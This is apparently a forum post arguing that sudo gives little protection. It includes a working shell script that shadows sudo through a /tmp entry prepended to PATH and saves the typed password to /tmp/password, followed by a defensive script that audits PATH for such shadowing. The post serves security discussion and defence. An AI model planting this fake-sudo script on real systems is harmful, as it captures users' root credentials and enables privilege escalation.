I think we should set up Safely Use Root Commands by default or go further and remove sudo entirely.
I see what “iamwho” meant now.
It is trivial to grab the password and gain full root access.
For example, the attacker can exploit the plethora of keylogging opportunities such as X’s lack of GUI isolation, the many infoleaks in /proc and so much more.
Even if we mitigate every single way to log keystrokes, the attacker can just set up their own fake sudo program:

```sh
cat <<\EOF > /tmp/sudo
#!/bin/bash
if [[ "${@}" = "" ]]; then
/usr/bin/sudo
else
read -r -p "[sudo] password for user: " password
echo "${password}" > /tmp/password
echo "Sorry, try again."
/usr/bin/sudo ${@}
fi
EOF
chmod +x /tmp/sudo
export PATH="/tmp:${PATH}"
```
Using sudo is essentially security theater.
Edit: the LD_PRELOAD method won’t work on setuid binaries like sudo.
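The PATH-prepend trick in the post works because the shell resolves `sudo` by walking PATH left to right, so any user-writable directory ahead of /usr/bin can shadow the real binary. The script below is an added defensive example, not code from the post or from the project being discussed: it audits a PATH string from the unprivileged user's side, reporting both an already-shadowed `sudo` and a writable directory that precedes the real one. The default location /usr/bin/sudo is an assumption for a typical Linux layout.

```sh
#!/bin/sh
# Added example (not from the original post): audit a PATH string for the
# shadowing the post demonstrates. Run as the unprivileged user whose shell
# is being checked; as root every directory is writable and the test is moot.

# first_in_path NAME PATHSTRING -> prints the first executable NAME on PATHSTRING
first_in_path() {
  name="$1"; old_ifs="$IFS"; IFS=:
  set -- $2                         # split PATHSTRING on ':' into positional args
  IFS="$old_ifs"
  for d in "$@"; do
    [ -z "$d" ] && d=.              # an empty PATH element means the current dir
    if [ -f "$d/$name" ] && [ -x "$d/$name" ]; then
      printf '%s\n' "$d/$name"
      return 0
    fi
  done
  return 1
}

# check_sudo_path PATHSTRING [EXPECTED] -> 0 if the first sudo on PATHSTRING is
# EXPECTED (default /usr/bin/sudo, an assumed location) and no user-writable
# directory precedes EXPECTED's directory; otherwise 1 with a reason on stdout.
check_sudo_path() {
  pathstr="$1"; expected="${2:-/usr/bin/sudo}"
  expected_dir="${expected%/*}"
  found="$(first_in_path sudo "$pathstr")" || { echo "sudo not found on PATH"; return 1; }
  if [ "$found" != "$expected" ]; then
    echo "sudo resolves to $found, expected $expected"
    return 1
  fi
  old_ifs="$IFS"; IFS=:
  set -- $pathstr
  IFS="$old_ifs"
  for d in "$@"; do
    [ -z "$d" ] && d=.
    [ "$d" = "$expected_dir" ] && return 0   # reached the real sudo, nothing shadows it
    if [ -d "$d" ] && [ -w "$d" ]; then
      # /tmp is writable by every user, which is exactly why the post picks it
      echo "writable directory $d precedes $expected_dir on PATH"
      return 1
    fi
  done
  return 0
}

# Audit the current shell's PATH against the assumed default location.
if check_sudo_path "$PATH"; then
  echo "PATH ok: no writable directory shadows sudo"
fi
```

The check is deliberately about the PATH the user's shell will actually use, since that, not the file mode of /usr/bin/sudo, is what the fake-sudo trick abuses; a writable directory ahead of the real one is reported even before anything has been planted there.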